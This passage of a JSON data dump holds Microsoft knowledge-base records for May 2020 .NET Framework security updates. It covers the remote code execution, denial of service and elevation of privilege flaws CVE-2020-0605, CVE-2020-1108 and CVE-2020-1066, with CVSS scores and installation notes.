the user to open the file. The security update addresses the vulnerability by correcting how .NET Framework checks the source markup of a file. To learn more about the vulnerabilities, go to the following Common Vulnerabilities and Exposures (CVE). \n\n * [CVE-2020-0605](<https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/cve-2020-0605>)\nA denial of service vulnerability exists when .NET Framework improperly handles web requests. An attacker who successfully exploited this vulnerability could cause a denial of service against a .NET Framework web application. The vulnerability can be exploited remotely, without authentication. A remote unauthenticated attacker could exploit this vulnerability by issuing specially crafted requests to the .NET Framework application. The update addresses the vulnerability by correcting how the .NET Framework web application handles web requests. To learn more about the vulnerabilities, go to the following Common Vulnerabilities and Exposures (CVE). \n * [CVE-2020-1108](<https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/cve-2020-1108>)\n** Important **\n\n * As a reminder to advanced IT administrators, updates to .NET Framework 3.5 for Windows 8.1 and Windows Server 2012 R2 should only be applied on systems where .NET Framework 3.5 is present and enabled. Customers who attempt to pre-install updates to .NET Framework 3.5 to offline images that do not contain the .NET Framework 3.5 product enabled will expose these systems to failures to enable .NET Framework 3.5 after the systems are online. For more extensive information about deploying .NET Framework 3.5, see [Microsoft .NET Framework 3.5 Deployment Considerations.](<https://docs.microsoft.com/en-us/windows-hardware/manufacture/desktop/microsoft-net-framework-35-deployment-considerations >)\n * All updates for Windows 8.1, Windows RT 8.1, and Windows Server 2012 R2 require that update KB 2919355 is installed. We recommend that you install update KB 2919355 on your Windows 8.1-based, Windows RT 8.1-based, or Windows Server 2012 R2-based computer so that you receive updates in the future.\n * If you install a language pack after you install this update, you must reinstall this update. Therefore, we recommend that you install any language packs that you need before you install this update. For more information, see [Add language packs to Windows](<https://technet.microsoft.com/en-us/library/hh825699>).\n\n## Additional information about this update\n\nThe following articles contain additional information about this update as it relates to individual product versions.\n\n * [4552982](<https://support.microsoft.com/help/4552982>) Description of the Security and Quality Rollup for .NET Framework 3.5 for Windows 8.1, RT 8.1, and Windows Server 2012 R2 (KB4552982) \n * [4552946](<https://support.microsoft.com/help/4552946>) Description of the Security and Quality Rollup for .NET Framework 4.5.2 for Windows 8.1, RT 8.1, and Windows Server 2012 R2 (KB4552946) \n * [4552923](<https://support.microsoft.com/help/4552923>) Description of the Security and Quality Rollup for .NET Framework 4.6, 4.6.1, 4.6.2, 4.7, 4.7.1, 4.7.2 for Windows 8.1, RT 8.1, and Windows Server 2012 R2 (KB4552923) \n * [4552933](<https://support.microsoft.com/help/4552933>) Description of the Security and Quality Rollup for .NET Framework 4.8 for Windows 8.1, RT 8.1, and Windows Server 2012 R2 (KB4552933) \n\n## Information about protection and security\n\n * Protect yourself online: [Windows Security support](<https://support.microsoft.com/hub/4099151/windows-security-help>)\n * Learn how we guard against cyber threats: [Microsoft Security](<https://www.microsoft.com/security>)\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2020-05-12T07:00:00", "type": "mskb", "title": "Security and Quality Rollup for .NET Framework 3.5, 4.5.2, 4.6, 4.6.1, 4.6.2, 4.7, 4.7.1, 4.7.2, 4.8 for Windows 8.1, RT 8.1, and Windows Server 2012 R2 (KB4556401)", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0605", "CVE-2020-1108"], "modified": "2020-05-12T07:00:00", "id": "KB4556401", "href": "https://support.microsoft.com/en-us/help/4556401", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-12-31T15:40:59", "description": "None\nRelease Date: \n**May 12, 2020** Version: \n** .NET Framework 3.5 and 4.8**\n\n## Summary\n\nA remote code execution vulnerability exists in .NET Framework software when the software fails to check the source markup of a file. An attacker who successfully exploited the vulnerability could run arbitrary code in the context of the current user. If the current user is logged on with administrative user rights, an attacker could take control of the affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights. Exploitation of the vulnerability requires that a user open a specially crafted file with an affected version of .NET Framework. In an email attack scenario, an attacker could exploit the vulnerability by sending the specially crafted file to the user and convincing the user to open the file. The security update addresses the vulnerability by correcting how .NET Framework checks the source markup of a file. To learn more about the vulnerabilities, go to the following Common Vulnerabilities and Exposures (CVE). \n\n * [CVE-2020-0605](<https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/cve-2020-0605>)\nA denial of service vulnerability exists when .NET Framework improperly handles web requests. An attacker who successfully exploited this vulnerability could cause a denial of service against a .NET Framework web application. The vulnerability can be exploited remotely, without authentication. A remote unauthenticated attacker could exploit this vulnerability by issuing specially crafted requests to the .NET Framework application. The update addresses the vulnerability by correcting how the .NET Framework web application handles web requests. To learn more about the vulnerabilities, go to the following Common Vulnerabilities and Exposures (CVE). \n * [CVE-2020-1108](<https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/cve-2020-1108>)\n\n## Known issues in this update \n\nMicrosoft is not currently aware of any issues in this update. \n\n## How to get this update\n\n**Install this update** This update will be downloaded and installed automatically from Windows Update. \nTo get the standalone package for this update, go to the [Microsoft Update Catalog](<http://catalog.update.microsoft.com/v7/site/Search.aspx?q=4552931>) website. **File information** For a list of the files that are provided in this update, download the [file information for cumulative update](<https://download.microsoft.com/download/d/a/9/da9019da-7092-43c4-ac1a-95ab1a2928a0/4552931.csv>). \n\n## Information about protection and security\n\n * Protect yourself online: [Windows Security support](<https://support.microsoft.com/hub/4099151/windows-security-help>)\n * Learn how we guard against cyber threats: [Microsoft Security](<https://www.microsoft.com/security>)\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-05-12T07:00:00", "type": "mskb", "title": "May 12, 2020-KB4552931 Cumulative Update for .NET Framework 3.5 and 4.8 for Windows 10 Version 1903 and Windows Server 1903 RTM and Windows 10, version 1909 and Windows Server, version 1909", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1108", "CVE-2020-0605"], "modified": "2020-05-12T07:00:00", "id": "KB4552931", "href": "https://support.microsoft.com/en-us/help/4552931", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-12-31T15:41:04", "description": "None\n**Applies to:**Microsoft .NET Framework 3.5 Microsoft .NET Framework 4.5.2 Microsoft .NET Framework 4.6 Microsoft .NET Framework 4.6.1 Microsoft .NET Framework 4.6.2 Microsoft .NET Framework 4.7 Microsoft .NET Framework 4.7.1 Microsoft .NET Framework 4.7.2 Microsoft .NET Framework 4.8 \n\n## Summary\n\nA remote code execution vulnerability exists in .NET Framework software when the software fails to check the source markup of a file. An attacker who successfully exploited the vulnerability could run arbitrary code in the context of the current user. If the current user is logged on with administrative user rights, an attacker could take control of the affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights. Exploitation of the vulnerability requires that a user open a specially crafted file with an affected version of .NET Framework. In an email attack scenario, an attacker could exploit the vulnerability by sending the specially crafted file to the user and convincing the user to open the file. The security update addresses the vulnerability by correcting how .NET Framework checks the source markup of a file. To learn more about the vulnerabilities, go to the following Common Vulnerabilities and Exposures (CVE). \n\n * [CVE-2020-0605](<https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/cve-2020-0605>)\nA denial of service vulnerability exists when .NET Framework improperly handles web requests. An attacker who successfully exploited this vulnerability could cause a denial of service against a .NET Framework web application. The vulnerability can be exploited remotely, without authentication. A remote unauthenticated attacker could exploit this vulnerability by issuing specially crafted requests to the .NET Framework application. The update addresses the vulnerability by correcting how the .NET Framework web application handles web requests. To learn more about the vulnerabilities, go to the following Common Vulnerabilities and Exposures (CVE). \n * [CVE-2020-1108](<https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/cve-2020-1108>)\n** Important **\n\n * All updates for .NET Framework 4.6, 4.6.1, 4.6.2, 4.7, 4.7.1, and 4.7.2 require that the d3dcompiler_47.dll update is installed. We recommend that you install the included d3dcompiler_47.dll update before you apply this update. For more information about the d3dcompiler_47.dll, see [KB 4019990](<https://support.microsoft.com/en-us/help/4019990>).\n * If you install a language pack after you install this update, you must reinstall this update. Therefore, we recommend that you install any language packs that you need before you install this update. For more information, see [Add language packs to Windows](<https://technet.microsoft.com/en-us/library/hh825699>).\n\n## Additional information about this update\n\nThe following articles contain additional information about this update as it relates to individual product versions.\n\n * [4552963](<https://support.microsoft.com/help/4552963>) Description of the Security Only Update for .NET Framework 3.5 for Windows Server 2012 (KB4552963) \n * [4552968](<https://support.microsoft.com/help/4552968>) Description of the Security Only Update for .NET Framework 4.5.2 for Windows Server 2012 (KB4552968) \n * [4552958](<https://support.microsoft.com/help/4552958>) Description of the Security Only Update for .NET Framework 4.6, 4.6.1, 4.6.2, 4.7, 4.7.1, 4.7.2 for Windows Server 2012 (KB4552958) \n * [4552961](<https://support.microsoft.com/help/4552961>) Description of the Security Only Update for .NET Framework 4.8 for Windows Server 2012 (KB4552961) \n\n## Information about protection and security\n\n * Protect yourself online: [Windows Security support](<https://support.microsoft.com/hub/4099151/windows-security-help>)\n * Learn how we guard against cyber threats: [Microsoft Security](<https://www.microsoft.com/security>)\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-05-12T07:00:00", "type": "mskb", "title": "Security Only Update for .NET Framework 3.5, 4.5.2, 4.6, 4.6.1, 4.6.2, 4.7, 4.7.1, 4.7.2, 4.8 for Windows Server 2012 (KB4556404)", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1108", "CVE-2020-0605"], "modified": "2020-05-12T07:00:00", "id": "KB4556404", "href": "https://support.microsoft.com/en-us/help/4556404", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-12T14:35:32", "description": "None\n**Applies to:**Microsoft .NET Framework 3.5.1 Microsoft .NET Framework 4.5.2 Microsoft .NET Framework 4.6 Microsoft .NET Framework 4.6.1 Microsoft .NET Framework 4.6.2 Microsoft .NET Framework 4.7 Microsoft .NET Framework 4.7.1 Microsoft .NET Framework 4.7.2 Microsoft .NET Framework 4.8 \n\n**IMPORTANT** Verify that you have installed the required updates listed in the **How to get this update** section before installing this update. \n\n**IMPORTANT **Some customers who use Windows Server 2008 R2 SP1 and have activated their ESU multiple activation key (MAK) add-on before installing the January 14, 2020 updates might need to re-activate their key. Re-activation on the affected devices should only be required once. For information on activation, see this [blog](<https://aka.ms/Windows7ESU/t_blank>) post. \n\n**IMPORTANT** WSUS scan cab files will continue to be available for Windows 7 SP1 and Windows Server 2008 R2 SP1. If you have a subset of devices running these operating systems without ESU, they might show as non-compliant in your patch management and compliance toolsets. \n\n**IMPORTANT** Customers who have purchased the [Extended Security Update (ESU)](<https://www.microsoft.com/en-us/cloud-platform/extended-security-updates>) for on-premises versions of these operating systems must follow the procedures in [KB4522133](<https://support.microsoft.com/en-us/help/4522133/procedure-to-continue-receiving-security-updates>) to continue receiving security updates after extended support ends on January 14, 2020. For more information on ESU and which editions are supported, see [KB4497181](<https://support.microsoft.com/en-us/help/4497181/lifecycle-faq-extended-security-updates>). \n\n**IMPORTANT** Starting on January 15, 2020, a full-screen notification will appear that describes the risk of continuing to use Windows 7 Service Pack 1 after it reaches end of support on January 14, 2020. The notification will remain on the screen until you interact with it. This notification will only appear on the following editions of Windows 7 Service Pack 1: **Note **The notification will not appear on domain-joined machines or machines in kiosk mode. \n\n * Starter.\n * Home Basic.\n * Home Premium.\n * Professional. If you have purchased the Extended Security Update (ESU), the notification will not appear. For more information, see [How to get Extended Security Updates for eligible Windows devices](<https://techcommunity.microsoft.com/t5/windows-it-pro-blog/archived-how-to-get-extended-security-updates-for-eligible/ba-p/917807>) and [Lifecycle FAQ-Extended Security Updates](<https://support.microsoft.com/en-us/help/4497181/lifecycle-faq-extended-security-updates>).\n * Ultimate.\n\n**IMPORTANT** Starting in August, 2019, updates to .NET Framework 4.6 and above, for Windows Server 2008 R2 SP1, and Windows 7SP1, require SHA-2 Code signing support. Please make sure that you have all the latest Windows Updates before applying this update to avoid installation issues. For more detailed information about SHA-2 code signing support updates, please see [KB 4474419](<https://support.microsoft.com/en-us/help/4474419/sha-2-code-signing-support-update>). \n\n**IMPORTANT** All updates for .NET Framework 4.7.2, 4.7.1, 4.7, 4.6.2, 4.6.1, and 4.6 require that the d3dcompiler_47.dll update is installed. We recommend that you install the included d3dcompiler_47.dll update before you apply this update. For more information about the d3dcompiler_47.dll, see [KB 4019990](<https://support.microsoft.com/en-us/help/4019990>). \n\n**IMPORTANT** If you install a language pack after you install this update, you must reinstall this update. Therefore, we recommend that you install any language packs that you need before you install this update. For more information, see [Add language packs to Windows](<https://technet.microsoft.com/en-us/library/hh825699>). \n\n## Summary\n\nAn elevation of privilege vulnerability exists in .NET Framework which could allow an attacker to elevate their privilege level. To exploit the vulnerability, an attacker would first have to access the local machine, and then run a malicious program. The update addresses the vulnerability by correcting how .NET Framework activates COM objects. To learn more about the vulnerabilities, go to the following Common Vulnerabilities and Exposures (CVE). \n\n * [CVE-2020-1066](<https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/cve-2020-1066>)\nA remote code execution vulnerability exists in .NET Framework software when the software fails to check the source markup of a file. An attacker who successfully exploited the vulnerability could run arbitrary code in the context of the current user. If the current user is logged on with administrative user rights, an attacker could take control of the affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights. Exploitation of the vulnerability requires that a user open a specially crafted file with an affected version of .NET Framework. In an email attack scenario, an attacker could exploit the vulnerability by sending the specially crafted file to the user and convincing the user to open the file. The security update addresses the vulnerability by correcting how .NET Framework checks the source markup of a file. To learn more about the vulnerabilities, go to the following Common Vulnerabilities and Exposures (CVE). \n * [CVE-2020-0605](<https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/cve-2020-0605>)\nA denial of service vulnerability exists when .NET Framework improperly handles web requests. An attacker who successfully exploited this vulnerability could cause a denial of service against a .NET Framework web application. The vulnerability can be exploited remotely, without authentication. A remote unauthenticated attacker could exploit this vulnerability by issuing specially crafted requests to the .NET Framework application. The update addresses the vulnerability by correcting how the .NET Framework web application handles web requests. To learn more about the vulnerabilities, go to the following Common Vulnerabilities and Exposures (CVE). \n * [CVE-2020-1108](<https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/cve-2020-1108>)\n\n## Known issues in some parts of this update\n\n**Symptom**| This update does not install, and it returns either or both of the following error messages:\n\n * -2146762495\n * A required certificate is not within its validity period when verifying against the current system clock or the timestamp in the signed file. \n---|--- \n**Workaround**| For details see the article for the .NET Framework individual product version for detailed instructions. \n \n## Additional information about this update\n\nThe following articles contain additional information about this update as it relates to individual product versions.\n\n * [4552940](<https://support.microsoft.com/help/4552940>) Description of the Security and Quality Rollup for .NET Framework 3.5.1 for Windows 7 SP1 and Windows Server 2008 R2 SP1 (KB4552940) \n * [4552920](<https://support.microsoft.com/help/4552920>) Description of the Security and Quality Rollup for .NET Framework 4.5.2 for Windows 7 SP1 and Windows Server 2008 R2 SP1 and Windows Server 2008 SP2 (KB4552920) \n * [4552919](<https://support.microsoft.com/help/4552919>) Description of the Security and Quality Rollup for .NET Framework 4.6, 4.6.1, 4.6.2, 4.7, 4.7.1, 4.7.2 for Windows 7 SP1 and Windows Server 2008 R2 SP1 and Windows Server 2008 SP2 (KB4552919) \n * [4552921](<https://support.microsoft.com/help/4552921>) Description of the Security and Quality Rollup for .NET Framework 4.8 for Windows 7 SP1 and Windows Server 2008 R2 SP1 (KB4552921) \n\n## Information about protection and security\n\n * Protect yourself online: [Windows Security support](<https://support.microsoft.com/hub/4099151/windows-security-help>)\n * Learn how we guard against cyber threats: [Microsoft Security](<https://www.microsoft.com/security>)\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2020-05-12T07:00:00", "type": "mskb", "title": "Security and Quality Rollup for .NET Framework 3.5.1, 4.5.2, 4.6, 4.6.1, 4.6.2, 4.7, 4.7.1, 4.7.2, 4.8 for Windows 7 SP1 and Windows Server 2008 R2 SP1 (KB4556399)", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0605", "CVE-2020-1066", "CVE-2020-1108"], "modified": "2020-05-12T07:00:00", "id": "KB4556399", "href": "https://support.microsoft.com/en-us/help/4556399", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-12-31T15:41:05", "description": "None\n## Notice\n\n**Revised 6/8/2021** On June 8th, 2021, this update was released to replace a previous update to address a \u201crevocation server was offline\u201d error that may occur during installation. If you've already installed a previous release of this update, no action is required. To obtain the latest version of these updates, see the \"How to obtain and install the update\" section of the individual update article. Links to each article are found in the \"Additional information about this update\" section of this article. On April 13th, 2021, this update was released to replace a previous release of this update.On July 23, 2020, update KB4552952 v2 and KB4552951 v2 were released to replace v1 of those updates for .NET Framework 4.5.2 and 4.6 for Windows Server 2008 SP2. The v1 updates did not install for customers who had certain ESU configurations. The v2 updates correct the issue for customers who could not install the v1 updates. \n\n**Applies to:**Microsoft .NET Framework 2.0 Microsoft .NET Framework 3.0 Microsoft .NET Framework 4.5.2 Microsoft .NET Framework 4.6\n\n**IMPORTANT **Verify thatyou have installed the required updates listed in the **How to get this update** section _before_ installing this update.\n\n**IMPORTANT** WSUS scan cab files will continue to be available for Windows Server 2008 SP2. If you have a subset of devices running this operating system without ESU, they might show as _non-compliant_ in your patch management and compliance toolsets.\n\n**IMPORTANT** Customers who have purchased the [Extended Security Update (ESU)](<https://www.microsoft.com/en-us/cloud-platform/extended-security-updates>) for on-premises versions of this OS must follow the procedures in KB4522133 to continue receiving security updates after extended support ends on January 14, 2020. For more information on ESU and which editions are supported, see [KB4497181](<https://docs.microsoft.com/{lang-locale}/lifecycle/faq/extended-security-updates>).\n\n**IMPORTANT** Starting in August, 2019, updates to .NET Framework 4.6 and above, for Windows Server 2008 SP2 require SHA-2 Code signing support. Please make sure that you have all the latest Windows Updates before applying this update to avoid installation issues. For more detailed information about SHA-2 code signing support updates, please see [KB 4474419](<https://support.microsoft.com/en-us/help/4474419/sha-2-code-signing-support-update>).\n\n**IMPORTANT** All updates for .NET Framework 4.7.2, 4.7.1, 4.7, 4.6.2, 4.6.1, and 4.6 require that the d3dcompiler_47.dll update is installed. We recommend that you install the included d3dcompiler_47.dll update before you apply this update. For more information about the d3dcompiler_47.dll, see [KB 4019990](<https://support.microsoft.com/en-us/help/4019990>).\n\n**IMPORTANT** If you install a language pack after you install this update, you must reinstall this update. Therefore, we recommend that you install any language packs that you need before you install this update. For more information, see [Add language packs to Windows](<https://technet.microsoft.com/en-us/library/hh825699>).\n\n## Summary\n\nAn elevation of privilege vulnerability exists in .NET Framework which could allow an attacker to elevate their privilege level. To exploit the vulnerability, an attacker would first have to access the local machine, and then run a malicious program. The update addresses the vulnerability by correcting how .NET Framework activates COM objects. To learn more about the vulnerabilities, go to the following Common Vulnerabilities and Exposures (CVE).\n\n * [CVE-2020-1066](<https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/cve-2020-1066>)\nA remote code execution vulnerability exists in .NET Framework software when the software fails to check the source markup of a file. An attacker who successfully exploited the vulnerability could run arbitrary code in the context of the current user. If the current user is logged on with administrative user rights, an attacker could take control of the affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights. Exploitation of the vulnerability requires that a user open a specially crafted file with an affected version of .NET Framework. In an email attack scenario, an attacker could exploit the vulnerability by sending the specially crafted file to the user and convincing the user to open the file. The security update addresses the vulnerability by correcting how .NET Framework checks the source markup of a file.To learn more about the vulnerabilities, go to the following Common Vulnerabilities and Exposures (CVE).\n * [CVE-2020-0605](<https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/cve-2020-0605>)\nA denial of service vulnerability exists when .NET Framework improperly handles web requests. An attacker who successfully exploited this vulnerability could cause a denial of service against a .NET Framework web application. The vulnerability can be exploited remotely, without authentication. A remote unauthenticated attacker could exploit this vulnerability by issuing specially crafted requests to the .NET Framework application. The update addresses the vulnerability by correcting how the .NET Framework web application handles web requests.To learn more about the vulnerabilities, go to the following Common Vulnerabilities and Exposures (CVE).\n * [CVE-2020-1108](<https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/cve-2020-1108>)\n\n## Known issues in some parts of this update\n\n**Symptom**| This update does not install, and it returns either or both of the following error messages:\n\n * -2146762495\n * A required certificate is not within its validity period when verifying against the current system clock or the timestamp in the signed file.\n * The revocation function was unable to check revocation because the revocation server was offline. \n---|--- \n**Workaround**| This issue was corrected by the latest release of the affected parts in this update.If you've already installed a previous release of the affected parts, no action is required. \n \n## Additional information about this update\n\nThe following articles contain additional information about this update as it relates to individual product versions.\n\n * [4552964](<https://support.microsoft.com/help/4552964>) Description of the Security Only Update for .NET Framework 2.0, 3.0 for Windows Server 2008 SP2 (KB4552964)\n * [4552952](<https://support.microsoft.com/help/4552952>) Description of the Security Only Update for .NET Framework 4.5.2 for Windows 7 SP1 and Windows Server 2008 R2 SP1 and Windows Server 2008 SP2 (KB4552952)\n * [4552951](<https://support.microsoft.com/help/4552951>) Description of the Security Only Update for .NET Framework 4.6 for Windows 7 SP1 and Windows Server 2008 R2 SP1 and Windows Server 2008 SP2 (KB4552951)\n\n## Information about protection and security\n\n * Protect yourself online: [Windows Security support](<https://support.microsoft.com/hub/4099151/windows-security-help>)\n * Learn how we guard against cyber threats: [Microsoft Security](<https://www.microsoft.com/security>)\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-05-12T07:00:00", "type": "mskb", "title": "Security Only Update for .NET Framework 2.0, 3.0, 4.5.2, 4.6 for Windows Server 2008 SP2 (KB4556406)", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1066", "CVE-2020-1108", "CVE-2020-0605"], "modified": "2020-05-12T07:00:00", "id": "KB4556406", "href": "https://support.microsoft.com/en-us/help/4556406", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-12T14:35:37", "description": "None\n**Applies to:**Microsoft .NET Framework 2.0 Microsoft .NET Framework 3.0 Microsoft .NET Framework 4.5.2 Microsoft .NET Framework 4.6 \n\n**IMPORTANT **Verify thatyou have installed the required updates listed in the **How to get this update** section _before_ installing this update. \n\n**IMPORTANT** WSUS scan cab files will continue to be available for Windows Server 2008 SP2. If you have a subset of devices running this operating system without ESU, they might show as _non-compliant_ in your patch management and compliance toolsets. \n\n**IMPORTANT** Customers who have purchased the [Extended Security Update (ESU)](<https://www.microsoft.com/en-us/cloud-platform/extended-security-updates>) for on-premises versions of this OS must follow the procedures in KB4522133 to continue receiving security updates after extended support ends on January 14, 2020. For more information on ESU and which editions are supported, see [KB4497181](<https://docs.microsoft.com/{lang-locale}/lifecycle/faq/extended-security-updates>). \n\n**IMPORTANT** Starting in August, 2019, updates to .NET Framework 4.6 and above, for Windows Server 2008 SP2 require SHA-2 Code signing support. Please make sure that you have all the latest Windows Updates before applying this update to avoid installation issues. For more detailed information about SHA-2 code signing support updates, please see [KB 4474419](<https://support.microsoft.com/en-us/help/4474419/sha-2-code-signing-support-update>). \n\n**IMPORTANT** All updates for .NET Framework 4.7.2, 4.7.1, 4.7, 4.6.2, 4.6.1, and 4.6 require that the d3dcompiler_47.dll update is installed. We recommend that you install the included d3dcompiler_47.dll update before you apply this update. For more information about the d3dcompiler_47.dll, see [KB 4019990](<https://support.microsoft.com/en-us/help/4019990>). \n\n**IMPORTANT** If you install a language pack after you install this update, you must reinstall this update. Therefore, we recommend that you install any language packs that you need before you install this update. For more information, see [Add language packs to Windows](<https://technet.microsoft.com/en-us/library/hh825699>). \n\n## Summary\n\nAn elevation of privilege vulnerability exists in .NET Framework which could allow an attacker to elevate their privilege level. To exploit the vulnerability, an attacker would first have to access the local machine, and then run a malicious program. The update addresses the vulnerability by correcting how .NET Framework activates COM objects. To learn more about the vulnerabilities, go to the following Common Vulnerabilities and Exposures (CVE). \n\n * [CVE-2020-1066](<https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/cve-2020-1066>)\nA remote code execution vulnerability exists in .NET Framework software when the software fails to check the source markup of a file. An attacker who successfully exploited the vulnerability could run arbitrary code in the context of the current user. If the current user is logged on with administrative user rights, an attacker could take control of the affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights. Exploitation of the vulnerability requires that a user open a specially crafted file with an affected version of .NET Framework. In an email attack scenario, an attacker could exploit the vulnerability by sending the specially crafted file to the user and convincing the user to open the file. The security update addresses the vulnerability by correcting how .NET Framework checks the source markup of a file. To learn more about the vulnerabilities, go to the following Common Vulnerabilities and Exposures (CVE). \n * [CVE-2020-0605](<https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/cve-2020-0605>)\nA denial of service vulnerability exists when .NET Framework improperly handles web requests. An attacker who successfully exploited this vulnerability could cause a denial of service against a .NET Framework web 